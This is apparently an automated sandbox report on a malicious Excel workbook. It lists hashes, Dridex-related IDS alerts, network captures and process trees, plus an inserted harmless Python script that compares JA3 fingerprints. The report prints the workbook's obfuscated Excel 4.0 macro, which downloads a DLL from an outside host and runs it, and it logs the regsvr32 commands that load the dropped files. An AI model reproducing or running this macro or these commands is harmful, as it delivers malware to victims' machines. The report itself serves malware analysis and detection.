SHA-256: 67E54B44DAD909734A59DF457950C05727B7ECF387F1F37C38C18CEF5AF579C2
SHA-512: 783213432A0CC54B92F5A49B0F314D949D48810A5D1FC36C92D26A302812E9B66618A0666FAE4BD33911DBC0542390844DA1436D4B9BC73A73D12B4C67929D1F
Malicious: true
Antivirus:
• Antivirus: Metadefender, Detection: 6%
• Antivirus: ReversingLabs, Detection: 4%
Joe Sandbox View:
• Filename: sample.ocx, Detection: malicious

Static File Info

General

File type: Microsoft Excel 2007+
Entropy (8bit): 7.867132102918904
TrID:
• Excel Microsoft Office Binary workbook document (47504/1) 49.74%
• Excel Microsoft Office Open XML Format document (40004/1) 41.89%
• ZIP compressed archive (8000/1) 8.38%
File name: Documents_13134976_1377491379.xlsb
File size: 64636
MD5: 276bf3db434b887bb77adca0bd46e130
SHA1: eee2be9136f2c70a28b6ca5289e73e2a38453da2
SHA256: 27180043ebeb8f2aa8728c5ee020fb5368be3df4e9008b8f01242bf82d5780ce
SHA512: abe0052635a1064304828a7b8fa8663997fb023d542944ddb3bdb346170bd5fbe9a76b2e53184e4b3c7a9e09a768982a396b7253d83c309fd7f522f427262e7a
SSDEEP: 1536:LvnO2wWjlMVGoIahaDHTU6hryF70liWWGH0AeWl+R:LGCj2sTU2yF70liWW200+R
File Content Preview: PK..........!.+...............[Content_Types].xml ...(....

File Icon

Icon Hash: 74f0d0d2c6d6d0f4

Static OLE Info

General

Document Type: OpenXML
Number of OLE Files: 1

OLE File "Documents_13134976_1377491379.xlsb"

Indicators

Has Summary Info:
Application Name:
Encrypted Document:
Contains Word Document Stream:
Contains Workbook/Book Stream:
Contains PowerPoint Document Stream:
Contains Visio Document Stream:
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:

Macro 4.0 Code

CALL(before.2.18.46.sheet!BJ29&before.2.18.46.sheet!BN29, before.2.18.46.sheet!BM35&before.2.18.46.sheet!BM38&before.2.18.46.sheet!BS41&before.2.18.46.sheet!BU41&before.2.18.46.sheet!BS25, before.2.18.46.sheet!BK50&before.2.18.46.sheet!BS42, before.2.18.46.sheet!BP33, before.2.18.46.sheet!BJ19&BJ20&BJ21&BJ22, before.2.18.46.sheet!BN24, before.2.18.46.sheet!BP38, before.2.18.46.sheet!BP41)

=EXEC(Sheet1!BF42&Sheet1!BF43&Sheet1!BF44&Sheet1!BN24)=HALT()
,,,,,,,,,,,,,,,ht,,,,,,,,,,,,,,,,,,,,,,,,,,tps://,,,,,,,,,,,,,,,,,,,,,,,,,,tpfcu.com/getfile.,,,,,,,,,,,,,,,,,,,,,,,,,,php,,,,,,,,,,,"=CALL(before.2.18.46.sheet!BJ29&before.2.18.46.sheet!BN29,before.2.18.46.sheet!BM35&before.2.18.46.sheet!BM38&before.2.18.46.sheet!BS41&before.2.18.46.sheet!BU41&before.2.18.46.sheet!BS25,before.2.18.46.sheet!BK50&before.2.18.46.sheet!BS42,before.2.18.46.sheet!BP33,before.2.18.46.sheet!BJ19&BJ20&BJ21&BJ22,before.2.18.46.sheet!BN24,before.2.18.46.sheet!BP38,before.2.18.46.sheet!BP41)",,,,,,,,,,,,,,,,,,,,,,,,,,=Sheet2!BB10(),,,,,,,,,,,,,,,,,,,..\iepfusn.dll,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,A,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,UR,,,,LMon,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,UR,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,LDownl,,,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,0,,,oa,,dToFile,,,,,,,,,,,re,,,,,,,,,,,,,CBB,,,,,,,,,,,,,gs,,,,,,,,,,,,,,,,,,,,,,,,,,"=""vr32 -s """,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,JJC,,,,,,,,,,

Network Behavior

Snort IDS Alerts

Timestamp                | Protocol | SID     | Message                                                                      | Source Port | Dest Port | Source IP     | Dest IP
06/09/21-15:22:05.833841 | ICMP     | 382     | ICMP PING Windows                                                            |             |           | 192.168.2.6   | 8.8.7.7
06/09/21-15:22:05.833841 | ICMP     | 384     | ICMP PING                                                                    |             |           | 192.168.2.6   | 8.8.7.7
06/09/21-15:22:10.528872 | ICMP     | 382     | ICMP PING Windows                                                            |             |           | 192.168.2.6   | 8.8.7.7
06/09/21-15:22:10.528872 | ICMP     | 384     | ICMP PING                                                                    |             |           | 192.168.2.6   | 8.8.7.7
06/09/21-15:22:20.469415 | ICMP     | 382     | ICMP PING Windows                                                            |             |           | 192.168.2.6   | 8.8.7.7
06/09/21-15:22:20.469415 | ICMP     | 384     | ICMP PING                                                                    |             |           | 192.168.2.6   | 8.8.7.7
06/09/21-15:22:25.029456 | ICMP     | 382     | ICMP PING Windows                                                            |             |           | 192.168.2.6   | 8.8.7.7
06/09/21-15:22:25.029456 | ICMP     | 384     | ICMP PING                                                                    |             |           | 192.168.2.6   | 8.8.7.7
06/09/21-15:22:36.677659 | ICMP     | 382     | ICMP PING Windows                                                            |             |           | 192.168.2.6   | 8.8.7.7
06/09/21-15:22:36.677659 | ICMP     | 384     | ICMP PING                                                                    |             |           | 192.168.2.6   | 8.8.7.7
06/09/21-15:22:41.530548 | ICMP     | 382     | ICMP PING Windows                                                            |             |           | 192.168.2.6   | 8.8.7.7
06/09/21-15:22:41.530548 | ICMP     | 384     | ICMP PING                                                                    |             |           | 192.168.2.6   | 8.8.7.7
06/09/21-15:22:49.386614 | TCP      | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443         | 49740     | 18.117.84.120 | 192.168.2.6
06/09/21-15:23:25.363224 | TCP      | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443         | 49747     | 18.117.84.120 | 192.168.2.6
06/09/21-15:23:57.298792 | TCP      | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443         | 49750     | 18.117.84.120 | 192.168.2.6

Network Port Distribution

TCP Packets


UDP Packets

                                                                                                                                                      Jun 9, 2021 15:22:33.401187897 CEST53637188.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:22:35.480846882 CEST6211653192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:22:35.617012978 CEST53621168.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:22:36.693973064 CEST6381653192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:22:36.752301931 CEST53638168.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:22:37.430131912 CEST5501453192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:22:37.571043968 CEST53550148.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:22:37.991182089 CEST6220853192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:22:38.050961018 CEST53622088.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:22:38.482630014 CEST5757453192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:22:38.550734043 CEST53575748.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:22:38.699526072 CEST5181853192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:22:38.760968924 CEST53518188.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:22:39.343851089 CEST5662853192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:22:39.405417919 CEST53566288.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:22:39.908086061 CEST6077853192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:22:39.969800949 CEST53607788.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:22:40.793365002 CEST5379953192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:22:40.852049112 CEST53537998.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:22:41.757324934 CEST5468353192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:22:41.818587065 CEST53546838.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:22:42.288892984 CEST5932953192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:22:42.350413084 CEST53593298.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:22:50.255160093 CEST6402153192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:22:50.318708897 CEST53640218.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:23:00.317203999 CEST5612953192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:23:00.378262997 CEST53561298.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:23:16.410259008 CEST5817753192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:23:16.469381094 CEST53581778.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:23:34.410224915 CEST5070053192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:23:34.482976913 CEST53507008.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:23:35.993652105 CEST5406953192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:23:36.063276052 CEST53540698.8.8.8192.168.2.6

ICMP Packets

Timestamp                            Source IP    Dest IP  Checksum  Code  Type
Jun 9, 2021 15:22:05.833841085 CEST  192.168.2.6  8.8.7.7  4d5a            Echo
Jun 9, 2021 15:22:10.528872013 CEST  192.168.2.6  8.8.7.7  4d59            Echo
Jun 9, 2021 15:22:20.469414949 CEST  192.168.2.6  8.8.7.7  4d58            Echo
Jun 9, 2021 15:22:25.029455900 CEST  192.168.2.6  8.8.7.7  4d57            Echo
Jun 9, 2021 15:22:36.677659035 CEST  192.168.2.6  8.8.7.7  4d56            Echo
Jun 9, 2021 15:22:41.530548096 CEST  192.168.2.6  8.8.7.7  4d55            Echo

DNS Queries

Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name       Type            Class
Jun 9, 2021 15:21:55.219571114 CEST  192.168.2.6  8.8.8.8  0x9318    Standard query (0)  tpfcu.com  A (IP address)  IN (0x0001)

DNS Answers

Timestamp                            Source IP  Dest IP      Trans ID  Reply Code    Name       CName  Address         Type            Class
Jun 9, 2021 15:21:55.279922962 CEST  8.8.8.8    192.168.2.6  0x9318    No error (0)  tpfcu.com         107.180.50.232  A (IP address)  IN (0x0001)

HTTPS Packets

Columns: Timestamp, Source IP, Source Port, Dest IP, Dest Port, Subject, Issuer, Not Before, Not After, JA3 SSL Client Fingerprint, JA3 SSL Client Digest (one record per connection; the certificate chain presented by the server is listed under the leaf certificate).

Jun 9, 2021 15:21:55.561739922 CEST
  Source IP:Port  107.180.50.232:443
  Dest IP:Port    192.168.2.6:49715
  Subject         CN=tpfcu.com, OU=Domain Control Validated
  Issuer          CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US
  Not Before      Fri Mar 05 15:44:31 CET 2021
  Not After       Wed Apr 06 16:44:31 CEST 2022
  Chain (intermediate)
    Subject       CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US
    Issuer        CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US
    Not Before    Tue May 03 09:00:00 CEST 2011
    Not After     Sat May 03 09:00:00 CEST 2031
  JA3 SSL Client Fingerprint  771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0
  JA3 SSL Client Digest       37f463bf4616ecd445d4a1937da06e19

Jun 9, 2021 15:22:49.386614084 CEST
  Source IP:Port  18.117.84.120:443
  Dest IP:Port    192.168.2.6:49740
  Subject         CN=amadeamadey.at, OU=Amadey Org, O=Amadey TM, L=Bohn, ST=Bohn, C=AT
  Issuer          CN=amadeamadey.at, OU=Amadey Org, O=Amadey TM, L=Bohn, ST=Bohn, C=AT (identical to Subject: self-signed)
  Not Before      Wed Jun 09 10:22:21 CEST 2021
  Not After       Thu Jun 09 10:22:21 CEST 2022
  JA3 SSL Client Fingerprint  771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,5-10-11-13-35-23-65281,29-23-24,0
  JA3 SSL Client Digest       8916410db85077a5460817142dcbc8de

Jun 9, 2021 15:23:25.363224030 CEST
  Source IP:Port  18.117.84.120:443
  Dest IP:Port    192.168.2.6:49747
  Subject         CN=amadeamadey.at, OU=Amadey Org, O=Amadey TM, L=Bohn, ST=Bohn, C=AT
  Issuer          CN=amadeamadey.at, OU=Amadey Org, O=Amadey TM, L=Bohn, ST=Bohn, C=AT (identical to Subject: self-signed)
  Not Before      Wed Jun 09 10:22:21 CEST 2021
  Not After       Thu Jun 09 10:22:21 CEST 2022
  JA3 SSL Client Fingerprint  771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,5-10-11-13-35-23-65281,29-23-24,0
  JA3 SSL Client Digest       8916410db85077a5460817142dcbc8de

Jun 9, 2021 15:23:57.298791885 CEST
  Source IP:Port  18.117.84.120:443
  Dest IP:Port    192.168.2.6:49750
  Subject         CN=amadeamadey.at, OU=Amadey Org, O=Amadey TM, L=Bohn, ST=Bohn, C=AT
  Issuer          CN=amadeamadey.at, OU=Amadey Org, O=Amadey TM, L=Bohn, ST=Bohn, C=AT (identical to Subject: self-signed)
  Not Before      Wed Jun 09 10:22:21 CEST 2021
  Not After       Thu Jun 09 10:22:21 CEST 2022
  JA3 SSL Client Fingerprint  771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,5-10-11-13-35-23-65281,29-23-24,0
  JA3 SSL Client Digest       8916410db85077a5460817142dcbc8de
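
The HTTPS table carries two distinct JA3 client fingerprints: one for the tpfcu.com connection and one shared by the three connections to 18.117.84.120. The Python below is an added example for working with those two strings; it is not part of the Joe Sandbox report. It splits a JA3 string into its five fields (TLS version, cipher suites, extensions, supported groups, EC point formats), computes the digest JA3 defines (MD5 of the string), and diffs the two fingerprints so the difference in TLS client is visible: the second client offers cipher suites 158 and 159, advertises extension 5 (status_request) and omits extension 0 (server_name). The fingerprint strings are copied from the table; the IANA extension names are a small lookup added here for readability.

```python
import hashlib

# JA3 client fingerprint strings copied from the HTTPS Packets table above:
# the tpfcu.com:443 connection and the 18.117.84.120:443 connections.
JA3_TPFCU = ("771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171"
             "-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0")
JA3_AMADEY = ("771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172"
              "-49171-157-156-61-60-53-47-10,5-10-11-13-35-23-65281,29-23-24,0")

FIELDS = ("version", "ciphers", "extensions", "curves", "point_formats")

# IANA names for the extensions that occur in these two strings (lookup added for readability).
EXT_NAMES = {0: "server_name", 5: "status_request", 10: "supported_groups",
             11: "ec_point_formats", 13: "signature_algorithms", 23: "extended_master_secret",
             35: "session_ticket", 65281: "renegotiation_info"}


def parse_ja3(ja3):
    """Split a JA3 string into its five fields: TLS version plus four '-'-joined integer lists."""
    parts = ja3.split(",")
    if len(parts) != len(FIELDS):
        raise ValueError("JA3 string needs exactly 5 comma-separated fields")
    parsed = {"version": int(parts[0])}
    for name, part in zip(FIELDS[1:], parts[1:]):
        parsed[name] = [int(x) for x in part.split("-")] if part else []
    return parsed


def ja3_digest(ja3):
    """JA3 digest as defined by the JA3 method: MD5 of the fingerprint string, hex-encoded."""
    return hashlib.md5(ja3.encode("ascii")).hexdigest()


def has_sni(ja3):
    """True when the client advertised extension 0 (server_name)."""
    return 0 in parse_ja3(ja3)["extensions"]


def diff_ja3(a, b):
    """Per field: for 'version' the pair of values, for the list fields
    (values only in a, values only in b), each sorted."""
    pa, pb = parse_ja3(a), parse_ja3(b)
    out = {"version": (pa["version"], pb["version"])}
    for name in FIELDS[1:]:
        out[name] = (sorted(set(pa[name]) - set(pb[name])),
                     sorted(set(pb[name]) - set(pa[name])))
    return out


if __name__ == "__main__":
    for label, s in (("tpfcu.com", JA3_TPFCU), ("18.117.84.120", JA3_AMADEY)):
        print(label, ja3_digest(s), "SNI" if has_sni(s) else "no SNI")
    for name, (only_a, only_b) in diff_ja3(JA3_TPFCU, JA3_AMADEY).items():
        if name == "version":
            continue
        fmt = (lambda v: f"{v} ({EXT_NAMES.get(v, '?')})") if name == "extensions" else str
        print(f"{name}: only in first {list(map(fmt, only_a))}, only in second {list(map(fmt, only_b))}")
```

Running ja3_digest() on a fingerprint string and comparing it with the report's JA3 SSL Client Digest column is a quick check that the string was captured verbatim; a mismatch means the displayed string is not the exact input the sandbox hashed.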

                                                                                                                                                      Code Manipulations

                                                                                                                                                      Statistics

                                                                                                                                                      Behavior


                                                                                                                                                      System Behavior

                                                                                                                                                      General

                                                                                                                                                      Start time:15:21:49
                                                                                                                                                      Start date:09/06/2021
                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                      Imagebase:0x10000
                                                                                                                                                      File size:27110184 bytes
                                                                                                                                                      MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      General

                                                                                                                                                      Start time:15:21:55
                                                                                                                                                      Start date:09/06/2021
                                                                                                                                                      Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:regsvr32 -s ..\iepfusn.dll
                                                                                                                                                      Imagebase:0xe50000
                                                                                                                                                      File size:20992 bytes
                                                                                                                                                      MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      General

                                                                                                                                                      Start time:15:21:56
                                                                                                                                                      Start date:09/06/2021
                                                                                                                                                      Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline: -s ..\iepfusn.dll
                                                                                                                                                      Imagebase:0x7ff62a730000
                                                                                                                                                      File size:24064 bytes
                                                                                                                                                      MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      General

                                                                                                                                                      Start time:15:22:03
                                                                                                                                                      Start date:09/06/2021
                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:cmd /c ping 8.8.7.7 -n 2 & start C:\Windows\system32\regsvr32.exe -s C:\Users\user\iepfusn.dll RV0KR
                                                                                                                                                      Imagebase:0x7ff7180e0000
                                                                                                                                                      File size:273920 bytes
                                                                                                                                                      MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      General

                                                                                                                                                      Start time:15:22:04
                                                                                                                                                      Start date:09/06/2021
                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                      Imagebase:0x7ff61de10000
                                                                                                                                                      File size:625664 bytes
                                                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      General

                                                                                                                                                      Start time:15:22:04
                                                                                                                                                      Start date:09/06/2021
                                                                                                                                                      Path:C:\Windows\System32\PING.EXE
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:ping 8.8.7.7 -n 2
                                                                                                                                                      Imagebase:0x7ff612a90000
                                                                                                                                                      File size:21504 bytes
                                                                                                                                                      MD5 hash:6A7389ECE70FB97BFE9A570DB4ACCC3B
                                                                                                                                                      Has elevated privileges:true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

General

Start time: 15:22:13
Start date: 09/06/2021
Path: C:\Windows\System32\regsvr32.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\regsvr32.exe -s C:\Users\user\iepfusn.dll RV0KR
Imagebase: 0x7ff62a730000
File size: 24064 bytes
MD5 hash: D78B75FC68247E8A63ACBA846182740E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 15:22:17
Start date: 09/06/2021
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: cmd /c ping 8.8.7.7 -n 2 & start C:\Windows\system32\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll N8DG
Imagebase: 0x7ff7180e0000
File size: 273920 bytes
MD5 hash: 4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 15:22:18
Start date: 09/06/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff61de10000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 15:22:19
Start date: 09/06/2021
Path: C:\Windows\System32\PING.EXE
Wow64 process (32bit): false
Commandline: ping 8.8.7.7 -n 2
Imagebase: 0x7ff612a90000
File size: 21504 bytes
MD5 hash: 6A7389ECE70FB97BFE9A570DB4ACCC3B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

General

Start time: 15:22:28
Start date: 09/06/2021
Path: C:\Windows\System32\regsvr32.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll N8DG
Imagebase: 0x7ff62a730000
File size: 24064 bytes
MD5 hash: D78B75FC68247E8A63ACBA846182740E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 15:22:34
Start date: 09/06/2021
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: cmd /c ping 8.8.7.7 -n 2 & start C:\Windows\system32\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll VE50DB
Imagebase: 0x7ff7180e0000
File size: 273920 bytes
MD5 hash: 4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 15:22:34
Start date: 09/06/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff61de10000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 15:22:35
Start date: 09/06/2021
Path: C:\Windows\System32\PING.EXE
Wow64 process (32bit): false
Commandline: ping 8.8.7.7 -n 2
Imagebase: 0x7ff612a90000
File size: 21504 bytes
MD5 hash: 6A7389ECE70FB97BFE9A570DB4ACCC3B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 15:22:43
Start date: 09/06/2021
Path: C:\Windows\System32\regsvr32.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\system32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll VE50DB
Imagebase: 0x7ff62a730000
File size: 24064 bytes
MD5 hash: D78B75FC68247E8A63ACBA846182740E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 15:22:44
Start date: 09/06/2021
Path: C:\Windows\System32\regsvr32.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll VE50DB
Imagebase: 0x7ff62a730000
File size: 24064 bytes
MD5 hash: D78B75FC68247E8A63ACBA846182740E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 15:22:51
Start date: 09/06/2021
Path: C:\Windows\System32\regsvr32.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\system32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll VE50DB
Imagebase: 0x7ff62a730000
File size: 24064 bytes
MD5 hash: D78B75FC68247E8A63ACBA846182740E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language